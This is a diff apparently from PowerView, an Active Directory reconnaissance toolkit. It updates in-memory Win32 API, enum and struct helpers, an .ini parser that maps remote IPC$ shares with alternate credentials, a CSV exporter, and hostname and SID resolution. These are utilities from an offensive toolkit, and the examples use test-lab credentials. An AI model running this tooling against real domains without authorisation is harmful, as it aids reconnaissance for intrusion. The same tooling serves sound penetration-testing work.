+)
+
+$Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32'
+$Kernel32 = $Types['kernel32']
+$Ntdll = $Types['ntdll']
+$Ntdll::RtlGetCurrentPeb()
+$ntdllbase = $Kernel32::GetModuleHandle('ntdll')
+$Kernel32::GetProcAddress($ntdllbase, 'RtlGetCurrentPeb')
 
-        Inspired by Lee Holmes' Invoke-WindowsApi http://poshcode.org/2189
+.NOTES
 
-        When defining multiple function prototypes, it is ideal to provide
-        Add-Win32Type with an array of function signatures. That way, they
-        are all incorporated into the same in-memory module.
+Inspired by Lee Holmes' Invoke-WindowsApi http://poshcode.org/2189
+
+When defining multiple function prototypes, it is ideal to provide
+Add-Win32Type with an array of function signatures. That way, they
+are all incorporated into the same in-memory module.
 #>
 
     [OutputType([Hashtable])]
     Param(
-        [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
+        [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]
         [String]
         $DllName,
 
-        [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
+        [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]
         [String]
         $FunctionName,
 
-        [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
+        [Parameter(ValueFromPipelineByPropertyName=$True)]
+        [String]
+        $EntryPoint,
+
+        [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]
         [Type]
         $ReturnType,
 
-        [Parameter(ValueFromPipelineByPropertyName = $True)]
+        [Parameter(ValueFromPipelineByPropertyName=$True)]
         [Type[]]
         $ParameterTypes,
 
-        [Parameter(ValueFromPipelineByPropertyName = $True)]
+        [Parameter(ValueFromPipelineByPropertyName=$True)]
         [Runtime.InteropServices.CallingConvention]
         $NativeCallingConvention = [Runtime.InteropServices.CallingConvention]::StdCall,
 
-        [Parameter(ValueFromPipelineByPropertyName = $True)]
+        [Parameter(ValueFromPipelineByPropertyName=$True)]
         [Runtime.InteropServices.CharSet]
         $Charset = [Runtime.InteropServices.CharSet]::Auto,
 
-        [Parameter(ValueFromPipelineByPropertyName = $True)]
+        [Parameter(ValueFromPipelineByPropertyName=$True)]
         [Switch]
         $SetLastError,
 
-        [Parameter(Mandatory = $True)]
+        [Parameter(Mandatory=$True)]
         [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]
         $Module,
 
@@ -290,11 +303,11 @@ function Add-Win32Type
 
             # Make each ByRef parameter an Out parameter
             $i = 1
-            ForEach($Parameter in $ParameterTypes)
+            foreach($Parameter in $ParameterTypes)
             {
                 if ($Parameter.IsByRef)
                 {
-                    [void] $Method.DefineParameter($i, 'Out', $Null)
+                    [void] $Method.DefineParameter($i, 'Out', $null)
                 }
 
                 $i++
@@ -304,14 +317,23 @@ function Add-Win32Type
             $SetLastErrorField = $DllImport.GetField('SetLastError')
             $CallingConventionField = $DllImport.GetField('CallingConvention')
             $CharsetField = $DllImport.GetField('CharSet')
+            $EntryPointField = $DllImport.GetField('EntryPoint')
             if ($SetLastError) { $SLEValue = $True } else { $SLEValue = $False }
 
+            if ($PSBoundParameters['EntryPoint']) { $ExportedFuncName = $EntryPoint } else { $ExportedFuncName = $FunctionName }
+
             # Equivalent to C# version of [DllImport(DllName)]
             $Constructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor([String])
             $DllImportAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($Constructor,
                 $DllName, [Reflection.PropertyInfo[]] @(), [Object[]] @(),
-                [Reflection.FieldInfo[]] @($SetLastErrorField, $CallingConventionField, $CharsetField),
-                [Object[]] @($SLEValue, ([Runtime.InteropServices.CallingConvention] $NativeCallingConvention), ([Runtime.InteropServices.CharSet] $Charset)))
+                [Reflection.FieldInfo[]] @($SetLastErrorField,
+                                           $CallingConventionField,
+                                           $CharsetField,
+                                           $EntryPointField),
+                [Object[]] @($SLEValue,
+                             ([Runtime.InteropServices.CallingConvention] $NativeCallingConvention),
+                             ([Runtime.InteropServices.CharSet] $Charset),
+                             $ExportedFuncName))
 
             $Method.SetCustomAttribute($DllImportAttribute)
         }
@@ -326,7 +348,7 @@ function Add-Win32Type
 
         $ReturnTypes = @{}
 
-        ForEach ($Key in $TypeHash.Keys)
+        foreach ($Key in $TypeHash.Keys)
         {
             $Type = $TypeHash[$Key].CreateType()
 
@@ -338,90 +360,88 @@ function Add-Win32Type
 }
 
 
-function psenum
-{
+function psenum {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Creates an in-memory enumeration for use in your PowerShell session.
+Creates an in-memory enumeration for use in your PowerShell session.
 
-        Author: Matthew Graeber (@mattifestation)
-        License: BSD 3-Clause
-        Required Dependencies: None
-        Optional Dependencies: None
-     
-    .DESCRIPTION
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
 
-        The 'psenum' function facilitates the creation of enums entirely in
-        memory using as close to a "C style" as PowerShell will allow.
+.DESCRIPTION
 
-    .PARAMETER Module
+The 'psenum' function facilitates the creation of enums entirely in
+memory using as close to a "C style" as PowerShell will allow.
 
-        The in-memory module that will host the enum. Use
-        New-InMemoryModule to define an in-memory module.
+.PARAMETER Module
 
-    .PARAMETER FullName
+The in-memory module that will host the enum. Use
+New-InMemoryModule to define an in-memory module.
 
-        The fully-qualified name of the enum.
+.PARAMETER FullName
 
-    .PARAMETER Type
+The fully-qualified name of the enum.
 
-        The type of each enum element.
+.PARAMETER Type
 
-    .PARAMETER EnumElements
+The type of each enum element.
 
-        A hashtable of enum elements.
+.PARAMETER EnumElements
 
-    .PARAMETER Bitfield
+A hashtable of enum elements.
 
-        Specifies that the enum should be treated as a bitfield.
+.PARAMETER Bitfield
 
-    .EXAMPLE
+Specifies that the enum should be treated as a bitfield.
 
-        $Mod = New-InMemoryModule -ModuleName Win32
+.EXAMPLE
 
-        $ImageSubsystem = psenum $Mod PE.IMAGE_SUBSYSTEM UInt16 @{
-            UNKNOWN =                  0
-            NATIVE =                   1 # Image doesn't require a subsystem.
-            WINDOWS_GUI =              2 # Image runs in the Windows GUI subsystem.
-            WINDOWS_CUI =              3 # Image runs in the Windows character subsystem.
-            OS2_CUI =                  5 # Image runs in the OS/2 character subsystem.
-            POSIX_CUI =                7 # Image runs in the Posix character subsystem.
-            NATIVE_WINDOWS =           8 # Image is a native Win9x driver.
-            WINDOWS_CE_GUI =           9 # Image runs in the Windows CE subsystem.
-            EFI_APPLICATION =          10
-            EFI_BOOT_SERVICE_DRIVER =  11
-            EFI_RUNTIME_DRIVER =       12
-            EFI_ROM =                  13
-            XBOX =                     14
-            WINDOWS_BOOT_APPLICATION = 16
-        }
+$Mod = New-InMemoryModule -ModuleName Win32
 
-    .NOTES
+$ImageSubsystem = psenum $Mod PE.IMAGE_SUBSYSTEM UInt16 @{
+    UNKNOWN =                  0
+    NATIVE =                   1 # Image doesn't require a subsystem.
+    WINDOWS_GUI =              2 # Image runs in the Windows GUI subsystem.
+    WINDOWS_CUI =              3 # Image runs in the Windows character subsystem.
+    OS2_CUI =                  5 # Image runs in the OS/2 character subsystem.
+    POSIX_CUI =                7 # Image runs in the Posix character subsystem.
+    NATIVE_WINDOWS =           8 # Image is a native Win9x driver.
+    WINDOWS_CE_GUI =           9 # Image runs in the Windows CE subsystem.
+    EFI_APPLICATION =          10
+    EFI_BOOT_SERVICE_DRIVER =  11
+    EFI_RUNTIME_DRIVER =       12
+    EFI_ROM =                  13
+    XBOX =                     14
+    WINDOWS_BOOT_APPLICATION = 16
+}
 
-        PowerShell purists may disagree with the naming of this function but
-        again, this was developed in such a way so as to emulate a "C style"
-        definition as closely as possible. Sorry, I'm not going to name it
-        New-Enum. :P
+.NOTES
+
+PowerShell purists may disagree with the naming of this function but
+again, this was developed in such a way so as to emulate a "C style"
+definition as closely as possible. Sorry, I'm not going to name it
+New-Enum. :P
 #>
 
     [OutputType([Type])]
-    Param
-    (
-        [Parameter(Position = 0, Mandatory = $True)]
+    Param (
+        [Parameter(Position = 0, Mandatory=$True)]
         [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]
         $Module,
 
-        [Parameter(Position = 1, Mandatory = $True)]
+        [Parameter(Position = 1, Mandatory=$True)]
         [ValidateNotNullOrEmpty()]
         [String]
         $FullName,
 
-        [Parameter(Position = 2, Mandatory = $True)]
+        [Parameter(Position = 2, Mandatory=$True)]
         [Type]
         $Type,
 
-        [Parameter(Position = 3, Mandatory = $True)]
+        [Parameter(Position = 3, Mandatory=$True)]
         [ValidateNotNullOrEmpty()]
         [Hashtable]
         $EnumElements,
@@ -446,10 +466,10 @@ function psenum
         $EnumBuilder.SetCustomAttribute($FlagsCustomAttribute)
     }
 
-    ForEach ($Key in $EnumElements.Keys)
+    foreach ($Key in $EnumElements.Keys)
     {
         # Apply the specified enum type to each element
-        $Null = $EnumBuilder.DefineLiteral($Key, $EnumElements[$Key] -as $EnumType)
+        $null = $EnumBuilder.DefineLiteral($Key, $EnumElements[$Key] -as $EnumType)
     }
 
     $EnumBuilder.CreateType()
@@ -458,15 +478,13 @@ function psenum
 
 # A helper function used to reduce typing while defining struct
 # fields.
-function field
-{
-    Param
-    (
-        [Parameter(Position = 0, Mandatory = $True)]
+function field {
+    Param (
+        [Parameter(Position = 0, Mandatory=$True)]
         [UInt16]
         $Position,
 
-        [Parameter(Position = 1, Mandatory = $True)]
+        [Parameter(Position = 1, Mandatory=$True)]
         [Type]
         $Type,
 
@@ -490,111 +508,110 @@ function field
 function struct
 {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Creates an in-memory struct for use in your PowerShell session.
+Creates an in-memory struct for use in your PowerShell session.
 
-        Author: Matthew Graeber (@mattifestation)
-        License: BSD 3-Clause
-        Required Dependencies: None
-        Optional Dependencies: field
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: field
 
-    .DESCRIPTION
+.DESCRIPTION
 
-        The 'struct' function facilitates the creation of structs entirely in
-        memory using as close to a "C style" as PowerShell will allow. Struct
-        fields are specified using a hashtable where each field of the struct
-        is comprosed of the order in which it should be defined, its .NET
-        type, and optionally, its offset and special marshaling attributes.
+The 'struct' function facilitates the creation of structs entirely in
+memory using as close to a "C style" as PowerShell will allow. Struct
+fields are specified using a hashtable where each field of the struct
+is comprosed of the order in which it should be defined, its .NET
+type, and optionally, its offset and special marshaling attributes.
 
-        One of the features of 'struct' is that after your struct is defined,
-        it will come with a built-in GetSize method as well as an explicit
-        converter so that you can easily cast an IntPtr to the struct without
-        relying upon calling SizeOf and/or PtrToStructure in the Marshal
-        class.
+One of the features of 'struct' is that after your struct is defined,
+it will come with a built-in GetSize method as well as an explicit
+converter so that you can easily cast an IntPtr to the struct without
+relying upon calling SizeOf and/or PtrToStructure in the Marshal
+class.
 
-    .PARAMETER Module
+.PARAMETER Module
 
-        The in-memory module that will host the struct. Use
-        New-InMemoryModule to define an in-memory module.
+The in-memory module that will host the struct. Use
+New-InMemoryModule to define an in-memory module.
 
-    .PARAMETER FullName
+.PARAMETER FullName
 
-        The fully-qualified name of the struct.
+The fully-qualified name of the struct.
 
-    .PARAMETER StructFields
+.PARAMETER StructFields
 
-        A hashtable of fields. Use the 'field' helper function to ease
-        defining each field.
+A hashtable of fields. Use the 'field' helper function to ease
+defining each field.
 
-    .PARAMETER PackingSize
+.PARAMETER PackingSize
 
-        Specifies the memory alignment of fields.
+Specifies the memory alignment of fields.
 
-    .PARAMETER ExplicitLayout
+.PARAMETER ExplicitLayout
 
-        Indicates that an explicit offset for each field will be specified.
+Indicates that an explicit offset for each field will be specified.
 
-    .EXAMPLE
+.EXAMPLE
 
-        $Mod = New-InMemoryModule -ModuleName Win32
+$Mod = New-InMemoryModule -ModuleName Win32
 
-        $ImageDosSignature = psenum $Mod PE.IMAGE_DOS_SIGNATURE UInt16 @{
-            DOS_SIGNATURE =    0x5A4D
-            OS2_SIGNATURE =    0x454E
-            OS2_SIGNATURE_LE = 0x454C
-            VXD_SIGNATURE =    0x454C
-        }
+$ImageDosSignature = psenum $Mod PE.IMAGE_DOS_SIGNATURE UInt16 @{
+    DOS_SIGNATURE =    0x5A4D
+    OS2_SIGNATURE =    0x454E
+    OS2_SIGNATURE_LE = 0x454C
+    VXD_SIGNATURE =    0x454C
+}
 
-        $ImageDosHeader = struct $Mod PE.IMAGE_DOS_HEADER @{
-            e_magic =    field 0 $ImageDosSignature
-            e_cblp =     field 1 UInt16
-            e_cp =       field 2 UInt16
-            e_crlc =     field 3 UInt16
-            e_cparhdr =  field 4 UInt16
-            e_minalloc = field 5 UInt16
-            e_maxalloc = field 6 UInt16
-            e_ss =       field 7 UInt16
-            e_sp =       field 8 UInt16
-            e_csum =     field 9 UInt16
-            e_ip =       field 10 UInt16
-            e_cs =       field 11 UInt16
-            e_lfarlc =   field 12 UInt16
-            e_ovno =     field 13 UInt16
-            e_res =      field 14 UInt16[] -MarshalAs @('ByValArray', 4)
-            e_oemid =    field 15 UInt16
-            e_oeminfo =  field 16 UInt16
-            e_res2 =     field 17 UInt16[] -MarshalAs @('ByValArray', 10)
-            e_lfanew =   field 18 Int32
-        }
+$ImageDosHeader = struct $Mod PE.IMAGE_DOS_HEADER @{
+    e_magic =    field 0 $ImageDosSignature
+    e_cblp =     field 1 UInt16
+    e_cp =       field 2 UInt16
+    e_crlc =     field 3 UInt16
+    e_cparhdr =  field 4 UInt16
+    e_minalloc = field 5 UInt16
+    e_maxalloc = field 6 UInt16
+    e_ss =       field 7 UInt16
+    e_sp =       field 8 UInt16
+    e_csum =     field 9 UInt16
+    e_ip =       field 10 UInt16
+    e_cs =       field 11 UInt16
+    e_lfarlc =   field 12 UInt16
+    e_ovno =     field 13 UInt16
+    e_res =      field 14 UInt16[] -MarshalAs @('ByValArray', 4)
+    e_oemid =    field 15 UInt16
+    e_oeminfo =  field 16 UInt16
+    e_res2 =     field 17 UInt16[] -MarshalAs @('ByValArray', 10)
+    e_lfanew =   field 18 Int32
+}
 
-        # Example of using an explicit layout in order to create a union.
-        $TestUnion = struct $Mod TestUnion @{
-            field1 = field 0 UInt32 0
-            field2 = field 1 IntPtr 0
-        } -ExplicitLayout
+# Example of using an explicit layout in order to create a union.
+$TestUnion = struct $Mod TestUnion @{
+    field1 = field 0 UInt32 0
+    field2 = field 1 IntPtr 0
+} -ExplicitLayout
 
-    .NOTES
+.NOTES
 
-        PowerShell purists may disagree with the naming of this function but
-        again, this was developed in such a way so as to emulate a "C style"
-        definition as closely as possible. Sorry, I'm not going to name it
-        New-Struct. :P
+PowerShell purists may disagree with the naming of this function but
+again, this was developed in such a way so as to emulate a "C style"
+definition as closely as possible. Sorry, I'm not going to name it
+New-Struct. :P
 #>
 
     [OutputType([Type])]
-    Param
-    (
-        [Parameter(Position = 1, Mandatory = $True)]
+    Param (
+        [Parameter(Position = 1, Mandatory=$True)]
         [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]
         $Module,
 
-        [Parameter(Position = 2, Mandatory = $True)]
+        [Parameter(Position = 2, Mandatory=$True)]
         [ValidateNotNullOrEmpty()]
         [String]
         $FullName,
 
-        [Parameter(Position = 3, Mandatory = $True)]
+        [Parameter(Position = 3, Mandatory=$True)]
         [ValidateNotNullOrEmpty()]
         [Hashtable]
         $StructFields,
@@ -635,13 +652,13 @@ function struct
     # Sort each field according to the orders specified
     # Unfortunately, PSv2 doesn't have the luxury of the
     # hashtable [Ordered] accelerator.
-    ForEach ($Field in $StructFields.Keys)
+    foreach ($Field in $StructFields.Keys)
     {
         $Index = $StructFields[$Field]['Position']
         $Fields[$Index] = @{FieldName = $Field; Properties = $StructFields[$Field]}
     }
 
-    ForEach ($Field in $Fields)
+    foreach ($Field in $Fields)
     {
         $FieldName = $Field['FieldName']
         $FieldProp = $Field['Properties']
@@ -714,480 +731,973 @@ function struct
 #
 ########################################################
 
-filter Get-IniContent {
+function Get-IniContent {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+This helper parses an .ini file into a hashtable.
+
+Author: 'The Scripting Guys'
+Modifications: @harmj0y (-Credential support)
+License: BSD 3-Clause
+Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection
+
+.DESCRIPTION
+
+Parses an .ini file into a hashtable. If -Credential is supplied,
+then Add-RemoteConnection is used to map \\COMPUTERNAME\IPC$, the file
+is parsed, and then the connection is destroyed with Remove-RemoteConnection.
+
+.PARAMETER Path
+
+Specifies the path to the .ini file to parse.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system.
+
+.EXAMPLE
+
+Get-IniContent C:\Windows\example.ini
+
+.EXAMPLE
+
+"C:\Windows\example.ini" | Get-IniContent
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-IniContent -Path \\PRIMARY.testlab.local\C$\Temp\GptTmpl.inf -Credential $Cred
 
-        This helper parses an .ini file into a proper PowerShell object.
-        
-        Author: 'The Scripting Guys'
-        Link: https://blogs.technet.microsoft.com/heyscriptingguy/2011/08/20/use-powershell-to-work-with-any-ini-file/
+.INPUTS
 
-    .LINK
+String
 
-        https://blogs.technet.microsoft.com/heyscriptingguy/2011/08/20/use-powershell-to-work-with-any-ini-file/
+Accepts one or more .ini paths on the pipeline.
+
+.OUTPUTS
+
+Hashtable
+
+Ouputs a hashtable representing the parsed .ini file.
+
+.LINK
+
+https://blogs.technet.microsoft.com/heyscriptingguy/2011/08/20/use-powershell-to-work-with-any-ini-file/
 #>
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType([Hashtable])]
     [CmdletBinding()]
     Param(
-        [Parameter(Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
-        [Alias('FullName')]
-        [ValidateScript({ Test-Path -Path $_ })]
+        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('FullName', 'Name')]
+        [ValidateNotNullOrEmpty()]
         [String[]]
-        $Path
+        $Path,
+
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    ForEach($TargetPath in $Path) {
-        $IniObject = @{}
-        Switch -Regex -File $TargetPath {
-            "^\[(.+)\]" # Section
-            {
-                $Section = $matches[1].Trim()
-                $IniObject[$Section] = @{}
-                $CommentCount = 0
+    BEGIN {
+        $MappedComputers = @{}
+    }
+
+    PROCESS {
+        ForEach ($TargetPath in $Path) {
+            if (($TargetPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) {
+                $HostComputer = (New-Object System.Uri($TargetPath)).Host
+                if (-not $MappedComputers[$HostComputer]) {
+                    # map IPC$ to this computer if it's not already
+                    Add-RemoteConnection -ComputerName $HostComputer -Credential $Credential
+                    $MappedComputers[$HostComputer] = $True
+                }
             }
-            "^(;.*)$" # Comment
-            {
-                $Value = $matches[1].Trim()
-                $CommentCount = $CommentCount + 1
-                $Name = 'Comment' + $CommentCount
-                $IniObject[$Section][$Name] = $Value
-            } 
-            "(.+?)\s*=(.*)" # Key
-            {
-                $Name, $Value = $matches[1..2]
-                $Name = $Name.Trim()
-                $Values = $Value.split(',') | ForEach-Object {$_.Trim()}
-                if($Values -isnot [System.Array]) {$Values = @($Values)}
-                $IniObject[$Section][$Name] = $Values
+
+            if (Test-Path -Path $TargetPath) {
+                $IniObject = @{}
+                Switch -Regex -File $TargetPath {
+                    "^\[(.+)\]" # Section
+                    {
+                        $Section = $matches[1].Trim()
+                        $IniObject[$Section] = @{}
+                        $CommentCount = 0
+                    }
+                    "^(;.*)$" # Comment
+                    {
+                        $Value = $matches[1].Trim()
+                        $CommentCount = $CommentCount + 1
+                        $Name = 'Comment' + $CommentCount
+                        $IniObject[$Section][$Name] = $Value
+                    }
+                    "(.+?)\s*=(.*)" # Key
+                    {
+                        $Name, $Value = $matches[1..2]
+                        $Name = $Name.Trim()
+                        $Values = $Value.split(',') | ForEach-Object { $_.Trim() }
+                        if ($Values -isnot [System.Array]) { $Values = @($Values) }
+                        $IniObject[$Section][$Name] = $Values
+                    }
+                }
+                $IniObject
             }
         }
-        $IniObject
+    }
+
+    END {
+        # remove the IPC$ mappings
+        $MappedComputers.Keys | Remove-RemoteConnection
     }
 }
 
-filter Export-PowerViewCSV {
+
+function Export-PowerViewCSV {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Converts objects into a series of comma-separated (CSV) strings and saves the
+strings in a CSV file in a thread-safe manner.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+
+.DESCRIPTION
+
+This helper exports an -InputObject to a .csv in a thread-safe manner
+using a mutex. This is so the various multi-threaded functions in
+PowerView has a thread-safe way to export output to the same file.
+Uses .NET IO.FileStream/IO.StreamWriter objects for speed.
+
+Originally based on Dmitry Sotnikov's Export-CSV code: http://poshcode.org/1590
+
+.PARAMETER InputObject
+
+Specifies the objects to export as CSV strings.
+
+.PARAMETER Path
+
+Specifies the path to the CSV output file.
+
+.PARAMETER Delimiter
+
+Specifies a delimiter to separate the property values. The default is a comma (,)
+
+.PARAMETER Append
+
+Indicates that this cmdlet adds the CSV output to the end of the specified file.
+Without this parameter, Export-PowerViewCSV replaces the file contents without warning.
+
+.EXAMPLE
+
+Get-DomainUser | Export-PowerViewCSV -Path "users.csv"
 
-        This helper exports an -InputObject to a .csv in a thread-safe manner
-        using a mutex. This is so the various multi-threaded functions in
-        PowerView has a thread-safe way to export output to the same file.
-        
-        Based partially on Dmitry Sotnikov's Export-CSV code
-            at http://poshcode.org/1590
+.EXAMPLE
 
-    .LINK
+Get-DomainUser | Export-PowerViewCSV -Path "users.csv" -Append -Delimiter '|'
 
-        http://poshcode.org/1590
-        http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/
+.INPUTS
+
+PSObject
+
+Accepts one or more PSObjects on the pipeline.
+
+.LINK
+
+http://poshcode.org/1590
+http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/
 #>
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [CmdletBinding()]
     Param(
-        [Parameter(Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
+        [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
         [System.Management.Automation.PSObject[]]
         $InputObject,
 
-        [Parameter(Mandatory=$True, Position=0)]
+        [Parameter(Mandatory = $True, Position = 1)]
+        [ValidateNotNullOrEmpty()]
         [String]
+        $Path,
+
+        [Parameter(Position = 2)]
         [ValidateNotNullOrEmpty()]
-        $OutFile
+        [Char]
+        $Delimiter = ',',
+
+        [Switch]
+        $Append
     )
 
-    $ObjectCSV = $InputObject | ConvertTo-Csv -NoTypeInformation
+    BEGIN {
+        $OutputPath = [IO.Path]::GetFullPath($PSBoundParameters['Path'])
+        $Exists = [System.IO.File]::Exists($OutputPath)
+
+        # mutex so threaded code doesn't stomp on the output file
+        $Mutex = New-Object System.Threading.Mutex $False,'CSVMutex'
+        $Null = $Mutex.WaitOne()
 
-    # mutex so threaded code doesn't stomp on the output file
-    $Mutex = New-Object System.Threading.Mutex $False,'CSVMutex';
-    $Null = $Mutex.WaitOne()
+        if ($PSBoundParameters['Append']) {
+            $FileMode = [System.IO.FileMode]::Append
+        }
+        else {
+            $FileMode = [System.IO.FileMode]::Create
+            $Exists = $False
+        }
 
-    if (Test-Path -Path $OutFile) {
-        # hack to skip the first line of output if the file already exists
-        $ObjectCSV | ForEach-Object { $Start=$True }{ if ($Start) {$Start=$False} else {$_} } | Out-File -Encoding 'ASCII' -Append -FilePath $OutFile
+        $CSVStream = New-Object IO.FileStream($OutputPath, $FileMode, [System.IO.FileAccess]::Write, [IO.FileShare]::Read)
+        $CSVWriter = New-Object System.IO.StreamWriter($CSVStream)
+        $CSVWriter.AutoFlush = $True
     }
-    else {
-        $ObjectCSV | Out-File -Encoding 'ASCII' -Append -FilePath $OutFile
+
+    PROCESS {
+        ForEach ($Entry in $InputObject) {
+            $ObjectCSV = ConvertTo-Csv -InputObject $Entry -Delimiter $Delimiter -NoTypeInformation
+
+            if (-not $Exists) {
+                # output the object field names as well
+                $ObjectCSV | ForEach-Object { $CSVWriter.WriteLine($_) }
+                $Exists = $True
+            }
+            else {
+                # only output object field data
+                $ObjectCSV[1..($ObjectCSV.Length-1)] | ForEach-Object { $CSVWriter.WriteLine($_) }
+            }
+        }
     }
 
-    $Mutex.ReleaseMutex()
+    END {
+        $Mutex.ReleaseMutex()
+        $CSVWriter.Dispose()
+        $CSVStream.Dispose()
+    }
 }
 
 
-filter Get-IPAddress {
+function Resolve-IPAddress {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Resolves a given hostename to its associated IPv4 address.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+
+.DESCRIPTION
+
+Resolves a given hostename to its associated IPv4 address using
+[Net.Dns]::GetHostEntry(). If no hostname is provided, the default
+is the IP address of the localhost.
+
+.EXAMPLE
+
+Resolve-IPAddress -ComputerName SERVER
+
+.EXAMPLE
+
+@("SERVER1", "SERVER2") | Resolve-IPAddress
 
-        Resolves a given hostename to its associated IPv4 address. 
-        If no hostname is provided, it defaults to returning
-        the IP address of the localhost.
+.INPUTS
 
-    .EXAMPLE
+String
 
-        PS C:\> Get-IPAddress -ComputerName SERVER
-        
-        Return the IPv4 address of 'SERVER'
+Accepts one or more IP address strings on the pipeline.
 
-    .EXAMPLE
+.OUTPUTS
 
-        PS C:\> Get-Content .\hostnames.txt | Get-IPAddress
+System.Management.Automation.PSCustomObject
 
-        Get the IP addresses of all hostnames in an input file.
+A custom PSObject with the ComputerName and IPAddress.
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('System.Management.Automation.PSCustomObject')]
     [CmdletBinding()]
-    param(
-        [Parameter(Position=0, ValueFromPipeline=$True)]
-        [Alias('HostName')]
-        [String]
-        $ComputerName = $Env:ComputerName
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('HostName', 'dnshostname', 'name')]
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $ComputerName = $Env:COMPUTERNAME
     )
 
-    try {
-        # extract the computer name from whatever object was passed on the pipeline
-        $Computer = $ComputerName | Get-NameField
-
-        # get the IP resolution of this specified hostname
-        @(([Net.Dns]::GetHostEntry($Computer)).AddressList) | ForEach-Object {
-            if ($_.AddressFamily -eq 'InterNetwork') {
-                $Out = New-Object PSObject
-                $Out | Add-Member Noteproperty 'ComputerName' $Computer
-                $Out | Add-Member Noteproperty 'IPAddress' $_.IPAddressToString
-                $Out
+    PROCESS {
+        ForEach ($Computer in $ComputerName) {
+            try {
+                @(([Net.Dns]::GetHostEntry($Computer)).AddressList) | ForEach-Object {
+                    if ($_.AddressFamily -eq 'InterNetwork') {
+                        $Out = New-Object PSObject
+                        $Out | Add-Member Noteproperty 'ComputerName' $Computer
+                        $Out | Add-Member Noteproperty 'IPAddress' $_.IPAddressToString
+                        $Out
+                    }
+                }
+            }
+            catch {
+                Write-Verbose "[Resolve-IPAddress] Could not resolve $Computer to an IP Address."
             }
         }
     }
-    catch {
-        Write-Verbose -Message 'Could not resolve host to an IP Address.'
-    }
 }
 
 
-filter Convert-NameToSid {
+function ConvertTo-SID {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Converts a given user/group name to a security identifier (SID).
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Convert-ADName, Get-DomainObject, Get-Domain  
+
+.DESCRIPTION
+
+Converts a "DOMAIN\username" syntax to a security identifier (SID)
+using System.Security.Principal.NTAccount's translate function. If alternate
+credentials are supplied, then Get-ADObject is used to try to map the name
+to a security identifier.
+
+.PARAMETER ObjectName
+
+The user/group name to convert, can be 'user' or 'DOMAIN\user' format.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the translation, defaults to the current domain.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to for the translation.
+
+.PARAMETER Credential
+
+Specifies an alternate credential to use for the translation.
+
+.EXAMPLE
+
+ConvertTo-SID 'DEV\dfm'
+
+.EXAMPLE
 
-        Converts a given user/group name to a security identifier (SID).
+'DEV\dfm','DEV\krbtgt' | ConvertTo-SID
 
-    .PARAMETER ObjectName
+.EXAMPLE
 
-        The user/group name to convert, can be 'user' or 'DOMAIN\user' format.
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+'TESTLAB\dfm' | ConvertTo-SID -Credential $Cred
 
-    .PARAMETER Domain
+.INPUTS
 
-        Specific domain for the given user account, defaults to the current domain.
+String
 
-    .EXAMPLE
+Accepts one or more username specification strings on the pipeline.
 
-        PS C:\> Convert-NameToSid 'DEV\dfm'
+.OUTPUTS
+
+String
+
+A string representing the SID of the translated name.
 #>
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType([String])]
     [CmdletBinding()]
-    param(
-        [Parameter(Mandatory=$True, ValueFromPipeline=$True)]
-        [String]
-        [Alias('Name')]
+    Param(
